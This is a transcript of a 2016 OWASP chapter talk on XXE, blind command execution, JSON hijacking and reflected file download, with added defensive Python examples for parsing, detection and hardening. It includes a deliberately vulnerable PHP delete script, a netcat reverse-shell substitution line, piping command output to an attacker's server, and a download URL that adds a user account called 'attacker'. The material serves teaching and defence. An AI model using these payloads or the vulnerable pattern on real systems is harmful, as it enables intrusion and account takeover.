owasp pune chapter : dive into the profound web attacks
TRANSCRIPT
Narendra Bhati - Security [email protected]
Dive Into The Profound Web Attacks
OWASP Pune Chapter – 18th Feb 2016
Speaker: Narendra Bhati, Security Analyst @ Suma Soft Pvt. Ltd. – Pune
Researcher & Part-Time Bug Bounty Hunter. Listed in the Halls of Fame for reporting security
vulnerabilities to Facebook, Google, Mozilla, Twitter etc. Holds more than 12 CVEs & 3 zero-day vulnerabilities.
Blog – http://websecgeeks.com
“Who Am I - r00tsh3ll”
If you have any questions or queries regarding the talk, kindly note them down so we can discuss them at the end.
Dive Into The Profound Web Attacks
• XXE (XML External Entity Injection)
• Blind RCE (Blind Remote/OS Command Execution)
• JSON Response Hijacking
• Reflected File Download
XXE (XML External Entity Injection)
According To OWASP
An XML External Entity attack is a type of injection attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data.
Why does XXE take place?
Failure to validate external XML entities, which gives an attacker access to internal resources/data.
Let's have a demo!
Getting a connection from the target domain.
Accessing internal directories. By brute forcing (or otherwise) we found a directory on localhost called “/betatesting/testing.php”, which is a network utility.
Invalid directory: the response contains “failed to load external entity”.
Valid directory: the response comes back without “failed to load external entity”, or there is some other kind of difference between the valid and invalid directory responses.
I am leaving out the rest of the process. As per the “testing.php” response, we added a GET parameter called “ping” and, as you can see, we were able to execute commands.
This is a scenario where the target system has some beta-testing application which is under development, etc. You should figure out what you can do with XXE or any other vulnerability.
Fixing the XXE
Disable external entity loading in the XML parser in order to prevent XXE.
For PHP: bool libxml_disable_entity_loader ([ bool $disable = true ] )
For .NET: settings.XmlResolver = null;
Look for the equivalent setting in other languages as well.
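As an added example (not from the talk), the same fix applied with Python's standard-library expat parser: the parser refuses any DOCTYPE, entity declaration or external entity reference before it could fetch anything, and a small classifier reports why an input was rejected, which is the kind of signal a request filter or log enricher can act on. The two sample documents are constructed for this example, and the host `internal.example` in the second one is a placeholder.

```python
import xml.parsers.expat as expat


class DtdRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE, an entity declaration or an external entity reference."""


def parse_untrusted_xml(document: str) -> list:
    """Parse XML from an untrusted source and return the element names in document order.

    Any DOCTYPE or entity declaration aborts parsing before the parser could fetch an
    external resource: the stdlib-expat counterpart of libxml_disable_entity_loader()
    in PHP or XmlResolver = null in .NET.
    """
    parser = expat.ParserCreate()
    # Parameter entities are the other route to an external fetch; never expand them.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    elements = []

    def reject_doctype(name, sysid, *_):
        raise DtdRejected(f"DOCTYPE {name!r} rejected (system id {sysid!r})")

    def reject_entity(entity_name, *_):
        raise DtdRejected(f"entity declaration {entity_name!r} rejected")

    def reject_external_ref(context, base, system_id, public_id):
        raise DtdRejected(f"external entity reference to {system_id!r} rejected")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external_ref
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(document, True)
    return elements


def check_xml(document: str) -> str:
    """Classify an input the way a request filter or log enricher would."""
    try:
        parse_untrusted_xml(document)
        return "accepted"
    except DtdRejected as exc:
        return f"rejected: {exc}"
    except expat.ExpatError as exc:
        return f"malformed: {exc}"


# Constructed sample inputs (not from the talk). The second declares an external entity
# pointing at a placeholder internal host, the shape of the probe used in the demo.
BENIGN_XML = '<?xml version="1.0"?><order><item>widget</item></order>'
XXE_XML = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE order [<!ENTITY probe SYSTEM "http://internal.example/betatesting/testing.php">]>'
    '<order>&probe;</order>'
)

if __name__ == "__main__":
    print(check_xml(BENIGN_XML))   # accepted
    print(check_xml(XXE_XML))      # starts with: rejected: DOCTYPE 'order' rejected
```

Rejecting the DOCTYPE outright is deliberate: a parser that merely ignores external entities can still be driven into internal-entity expansion, whereas most application payloads never need a DTD at all.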
Blind RCE (Blind Remote/OS Command Execution)
By nature/behaviour it is similar to, or the elder brother of, the Blind SQL Injection vulnerability.
According To OWASP
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
Why does RCE take place?
Missing or insufficient sanitization of user input, which is appended to a system shell command at execution time.
Ex. Vulnerable Code (PHP)
<?php
print("Please specify the name of the file to delete");
print("<p>");
$file = $_GET['filename'];   // untrusted value taken straight from the query string
system("rm $file");          // injection point: $file is interpolated into a shell command unsanitized
?>
Some basics about chaining commands
• A; B = Run A and then B, regardless of whether A succeeded
• A || B = Run B only if A failed; A always runs
• A && B = Run B only if A succeeded; if A failed, B will not execute
• A & B = Run A in the background and then B; B executes even if A fails
• A | B = Run A and pass the output of A to B
• A %0a B = URL-encoded newline as separator (useful for web apps)
• $(nc -nv ip port -e /bin/bash) = command substitution; the inner command runs and its output is substituted
Demo Time
Normal RCE | Some Bypasses | Blind RCE [Low-Medium]
Detection on time-delay response
Response comes in approx. 4 sec.
Response comes in approx. 11 sec.
In the demonstration, we are assuming that the target server is configured in such a way that it will not send a reverse connection using the netcat -e option, and we can't use wget either.
The response from the command “id” is getting logged in our Python simple HTTP server.
Let's see whether we are able to access the /var/tmp folder. Yes we are, because in the Python server we got the response as /var/tmp.
Using a similar kind of approach, we can interact with the shell response. Remember we are not using the netcat -e option for the response; we are just piping the output to another machine.
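An added defender-side example, not part of the talk: the same 4-second versus 11-second gap, seen from the server's access log instead of the attacker's browser. The log lines are constructed, in an assumed nginx-style combined format with the request time appended; the script groups requests by path, takes the median response time as the baseline and flags any request whose delay exceeds it by a configurable margin, which is what a blind, time-based probe looks like from the inside.

```python
import re
import statistics
from collections import defaultdict
from urllib.parse import urlsplit

# Assumed log format for this example: nginx "combined" with $request_time appended.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rt>\d+\.\d+)$'
)


def parse_line(line: str):
    """Return the fields we need, or None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        "query": parts.query,
        "rt": float(m.group("rt")),
    }


def find_timing_outliers(lines, min_delta: float = 5.0, min_samples: int = 3) -> list:
    """Flag requests that took at least `min_delta` seconds longer than the median for their path.

    A blind, time-based probe changes nothing in the response body or status, so the
    only server-side trace is this gap between the baseline and the probed request.
    """
    by_path = defaultdict(list)
    for entry in filter(None, map(parse_line, lines)):
        by_path[entry["path"]].append(entry)

    flagged = []
    for path, group in by_path.items():
        if len(group) < min_samples:
            continue  # not enough traffic to call anything an outlier
        baseline = statistics.median(e["rt"] for e in group)
        for e in group:
            delta = e["rt"] - baseline
            if delta >= min_delta:
                flagged.append({**e, "baseline": baseline, "delta": round(delta, 2)})
    return flagged


# Constructed access-log lines: four normal calls to the utility (about 4 s each, as in
# the demo) and one that took 11 s, plus unrelated static requests for contrast.
SAMPLE_LOG = [
    '10.0.0.7 - - [18/Feb/2016:10:00:01 +0530] "GET /betatesting/testing.php?ping=10.0.0.5 HTTP/1.1" 200 312 4.10',
    '10.0.0.7 - - [18/Feb/2016:10:00:06 +0530] "GET /betatesting/testing.php?ping=10.0.0.5 HTTP/1.1" 200 312 3.90',
    '10.0.0.8 - - [18/Feb/2016:10:00:07 +0530] "GET /index.html HTTP/1.1" 200 1024 0.02',
    '10.0.0.9 - - [18/Feb/2016:10:00:08 +0530] "GET /betatesting/testing.php?ping=10.0.0.6 HTTP/1.1" 200 312 4.00',
    '198.51.100.9 - - [18/Feb/2016:10:00:09 +0530] "GET /betatesting/testing.php?ping=test-payload HTTP/1.1" 200 312 11.00',
    '10.0.0.8 - - [18/Feb/2016:10:00:10 +0530] "GET /index.html HTTP/1.1" 200 1024 0.03',
    '10.0.0.7 - - [18/Feb/2016:10:00:12 +0530] "GET /betatesting/testing.php?ping=10.0.0.5 HTTP/1.1" 200 312 4.20',
    '10.0.0.8 - - [18/Feb/2016:10:00:13 +0530] "GET /index.html HTTP/1.1" 200 1024 0.02',
]

if __name__ == "__main__":
    for hit in find_timing_outliers(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["path"]}?{hit["query"]} took {hit["rt"]}s '
              f'(baseline {hit["baseline"]}s, +{hit["delta"]}s)')
```

The median is used rather than the mean so that a single slow probe does not drag the baseline up and hide itself; `min_samples` keeps rarely hit paths from producing noise.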
Fixing the Command Execution
• The developer should scrub all input for malicious characters.
• It is much easier to define the legal characters than the illegal characters.
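An added example (not the speaker's code) that contrasts the vulnerable `system("rm $file")` pattern from the PHP slide with the two fixes above, written in Python. `shell_commands_seen` splits a command line on the separators from the chaining list to show how many commands the shell would actually run, and `build_delete_argv` applies an allow-list of legal characters, pins the file to a fixed directory and passes an argv list so no shell is involved at all. The base directory `/var/app/uploads` is an assumed placeholder.

```python
import re
import shlex
import subprocess

# Separators from the chaining list: any of these inside a value means the shell would
# run more than the one command the developer wrote.
SEPARATOR_RE = re.compile(r"\|\||&&|[;|&\n]")
SHELL_METACHARS = set(";|&$`\n<>()")
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")   # the legal characters, not the illegal ones


def vulnerable_command_line(filename: str) -> str:
    """What the slide's PHP `system("rm $file")` hands to /bin/sh: raw string interpolation."""
    return f"rm {filename}"


def shell_commands_seen(cmdline: str) -> list:
    """Split a command line on the separators above, the way the shell would break it up."""
    return [part.strip() for part in SEPARATOR_RE.split(cmdline) if part.strip()]


def contains_shell_metachars(value: str) -> bool:
    """Cheap detection for request parameters that should never contain shell syntax."""
    return any(ch in SHELL_METACHARS for ch in value)


def validate_filename(filename: str) -> str:
    """Allow-list check: a bare name made of legal characters, no path separators, no '.'/'..'."""
    if not SAFE_FILENAME.match(filename) or filename in (".", ".."):
        raise ValueError(f"illegal filename: {filename!r}")
    return filename


def build_delete_argv(filename: str, base_dir: str = "/var/app/uploads") -> list:
    """Hardened form: validated name, pinned directory (assumed placeholder), argv list
    instead of a shell string, and '--' so a name starting with '-' is not an option."""
    name = validate_filename(filename)
    return ["rm", "--", f"{base_dir}/{name}"]


def delete_upload(filename: str, base_dir: str = "/var/app/uploads", dry_run: bool = True) -> str:
    """Run the hardened delete; with dry_run the command is only rendered, not executed."""
    argv = build_delete_argv(filename, base_dir)
    if not dry_run:
        subprocess.run(argv, check=False)   # list form: no shell, so no separators are interpreted
    return shlex.join(argv)


if __name__ == "__main__":
    for value in ("report.txt", "report.txt; id"):
        print(value, "->", shell_commands_seen(vulnerable_command_line(value)))
        try:
            print("   hardened:", delete_upload(value))
        except ValueError as exc:
            print("   hardened:", exc)
```

The allow-list is the important half: the argv form alone would still let `../` reach outside the upload directory, and the regex alone would still be fragile if the name were later pasted into another shell string.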
JSON Response Hijacking
According To Sources
Similar to CSRF, this vulnerability is basically based on a browser bug which allows an attacker to steal a sensitive JSON response from the victim's authenticated session, or there could be more interesting things.
JSON hijacking happens if the service:
Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/
• returns sensitive data.
• returns a JSON array. [content type: json]
• responds to GET requests.
• the browser making the request has JavaScript enabled (the browser making the request supports the __defineSetter__ method).
Let's dive into the demo!
Fixing JSON Hijacking
Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/
• Only return JSON objects to POST requests.
• Prevent the web browser from interpreting the JSON object as valid JavaScript code.
• Implement CSRF protection random tokens for all JSON requests.
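An added example, not from the slides or the cited article, that puts the four conditions and the three fixes in one place in Python. `hijack_conditions` evaluates a response the way a reviewer would (the browser-side condition cannot be observed from the server, so it is assumed to hold), and `build_json_response` only answers POST, requires a CSRF token, wraps the array in an object and prefixes the body with `)]}',\n`, a common anti-hijacking prefix that is my choice here rather than something the slide prescribes. `RECORDS`, the `d` wrapper key and the `X-CSRF-Token` header name are constructed.

```python
import hmac
import json

CSRF_HEADER = "X-CSRF-Token"        # constructed header name for this example
ANTI_HIJACK_PREFIX = ")]}',\n"       # makes the body a syntax error if loaded as a <script>


def hijack_conditions(method: str, headers: dict, body: str, sensitive: bool) -> list:
    """The server-observable conditions from the slide; the fourth (a JS-enabled browser
    with __defineSetter__) is on the client's side and is assumed to hold."""
    reasons = []
    if sensitive:
        reasons.append("returns sensitive data")
    if "json" in headers.get("Content-Type", "").lower() and body.lstrip().startswith("["):
        reasons.append("returns a bare JSON array")
    if method.upper() == "GET":
        reasons.append("responds to GET requests")
    return reasons


def is_hijackable(method: str, headers: dict, body: str, sensitive: bool) -> bool:
    """All three server-side conditions must hold for the array to be readable cross-site."""
    return len(hijack_conditions(method, headers, body, sensitive)) == 3


def build_json_response(method: str, session_token: str, supplied_token, records: list) -> dict:
    """Apply the three fixes: POST only, CSRF token required, array wrapped in an object
    and prefixed so the body is not valid JavaScript."""
    headers = {"Content-Type": "application/json", "X-Content-Type-Options": "nosniff"}
    if method.upper() != "POST":
        return {"status": 405, "headers": headers, "body": json.dumps({"error": "POST required"})}
    if not supplied_token or not hmac.compare_digest(session_token, supplied_token):
        return {"status": 403, "headers": headers, "body": json.dumps({"error": "bad CSRF token"})}
    body = ANTI_HIJACK_PREFIX + json.dumps({"d": records})   # "d" wrapper key is a convention chosen here
    return {"status": 200, "headers": headers, "body": body}


def parse_protected_body(body: str) -> dict:
    """Client side: strip the prefix before decoding (only a same-origin XHR can read the text)."""
    if body.startswith(ANTI_HIJACK_PREFIX):
        body = body[len(ANTI_HIJACK_PREFIX):]
    return json.loads(body)


# Constructed sample data standing in for a logged-in user's records, and the
# response a legacy GET endpoint would have returned for them.
RECORDS = [{"id": 1, "email": "alice@example.com"}, {"id": 2, "email": "bob@example.com"}]
LEGACY_HEADERS = {"Content-Type": "application/json"}
LEGACY_BODY = json.dumps(RECORDS)

if __name__ == "__main__":
    print("legacy GET endpoint hijackable:", is_hijackable("GET", LEGACY_HEADERS, LEGACY_BODY, True))
    fixed = build_json_response("POST", "tok-123", "tok-123", RECORDS)
    print("fixed endpoint hijackable:", is_hijackable("POST", fixed["headers"], fixed["body"], True))
    print(parse_protected_body(fixed["body"]))
```

Each fix closes a different condition: POST-only removes the `<script src>` route, the object wrapper and prefix make the body useless even if a GET slips through, and the token check fails the request before any data is serialised.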
Reflected File Download
According To Sources
RFD is a web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from a trusted domain. Recently found in Facebook & Google etc. by researchers.
Source- https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
Let's separate those words
Reflected: there should be a reflection of the value given in the URL in the response.
Filename: the file name should be permissive (allowing or characterized by great or excessive freedom of behaviour), so the application also accepts additional user-controlled values and a file type. For example, the application can accept a filename between the first slash “/” and the “?” character.
Ex. Code (PHP) (Will Not Work)
Download:
https://anyvulnerablewebsite.com/json;/maliciousfile.bat/.exe?download=anycommand “malicious.bat/,exe“
So basically this is browser behaviour, i.e. how the browser handles the download process. The mentioned behaviour is for Chrome; other browsers may behave differently for the same URL.
Attack Scenario
1. The attacker sends the victim a malicious URL on a trusted domain.
Ex. http://anytrustedsite.com/apitest/search;setup.bat?term=f00bar&callback=net user attacker attacker
2. The victim finds that the domain is trusted, so they access the URL.
3. After clicking on the URL, the file is downloaded, and after executing that file, something interesting happens. ;)
Let's see a demo
As you can see we have a web application. The value of the download parameter comes back in the response without a filename header, and the response is downloadable.
Now we are going to enter a file name in the URL. Because the response header doesn't carry a filename, we have a chance to control the file name from the URL itself.
Now we can craft a payload as input which will execute some system command on the victim's machine. As per the reflection, we can separate out the rest of the value to perform a command execution.
After executing that file we have calc execution.
Create some interesting payload. Before doing so, let's check out the user accounts.
After executing the downloaded file, we have another user account called “attacker”.
Fixing the Reflected File Download
• Add - Content-Disposition: attachment; filename=anyfile.pdf/txt
• Don't allow the application to take permissive input.
• Limit the callback function for “;:/” characters.
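An added example, not from the talk or the referenced paper, that turns the three ingredients (reflected, filename, download) into a check and applies the fixes from this slide in Python: `rfd_findings` inspects one request/response pair, and `build_jsonp_response` restricts the callback to a plain JavaScript identifier (so `;`, `:` and `/` are refused), sets a fixed `Content-Disposition` filename and adds `X-Content-Type-Options: nosniff`, an extra hardening beyond the slide. The request target, the callback value `untrusted;value` and the filename `api-response.json` are constructed.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$")   # a plain JS identifier: no ';', ':', '/' or spaces
FIXED_DOWNLOAD_NAME = "api-response.json"                       # constructed name for this example


def path_suggested_filename(request_target: str) -> str:
    """The name a permissive browser would take from the URL when the server sends none:
    the last path segment, minus any ';' path-parameter prefix (the /search;setup.bat case)."""
    segment = urlsplit(request_target).path.rsplit("/", 1)[-1]
    if ";" in segment:
        segment = segment.split(";", 1)[1]
    return segment


def rfd_findings(request_target: str, headers: dict, body: str) -> list:
    """Check the three ingredients (reflected, filename, download) for one request/response pair."""
    findings = []
    for name, values in parse_qs(urlsplit(request_target).query).items():
        for value in values:
            if value and value in body:
                findings.append(f"reflected: parameter {name!r} appears verbatim in the response body")
    disposition = headers.get("Content-Disposition", "")
    if "filename=" not in disposition:
        suggested = path_suggested_filename(request_target)
        findings.append(f"filename: no filename header, browser may take {suggested!r} from the URL")
    if "attachment" in disposition:
        findings.append("download: response is served as an attachment")
    return findings


def is_rfd_exposed(findings: list) -> bool:
    """Exposed only when all three ingredients are present."""
    return all(any(f.startswith(kind) for f in findings) for kind in ("reflected", "filename", "download"))


def build_jsonp_response(callback, payload: dict) -> dict:
    """Hardened endpoint: identifier-only callback, fixed download filename, nosniff."""
    headers = {
        "Content-Type": "application/json",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f"attachment; filename={FIXED_DOWNLOAD_NAME}",
    }
    data = json.dumps(payload)
    if callback is None:
        return {"status": 200, "headers": headers, "body": data}
    if not CALLBACK_RE.match(callback):
        return {"status": 400, "headers": headers, "body": json.dumps({"error": "invalid callback"})}
    return {"status": 200, "headers": headers, "body": f"{callback}({data});"}


# Constructed request in the shape shown on the attack-scenario slide, with a harmless
# callback value that still carries a ';' separator, and the legacy response to it.
REQUEST_TARGET = "/apitest/search;setup.bat?term=f00bar&callback=untrusted%3Bvalue"
LEGACY_HEADERS = {"Content-Type": "application/json", "Content-Disposition": "attachment"}
LEGACY_BODY = 'untrusted;value({"term": "f00bar"});'

if __name__ == "__main__":
    legacy = rfd_findings(REQUEST_TARGET, LEGACY_HEADERS, LEGACY_BODY)
    print("legacy exposed:", is_rfd_exposed(legacy), legacy)
    fixed = build_jsonp_response("untrusted;value", {"term": "f00bar"})
    print("fixed exposed:", is_rfd_exposed(rfd_findings(REQUEST_TARGET, fixed["headers"], fixed["body"])))
```

A legitimate callback is still reflected by the hardened endpoint, which is fine: with the filename pinned by the server and the callback limited to an identifier, the URL path can no longer decide what the saved file is called or what the first line of it contains.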
Thanks for listening peacefully.
Kindly send me your feedback regarding the talk on – [email protected]. It will help me to improve the presentation next time.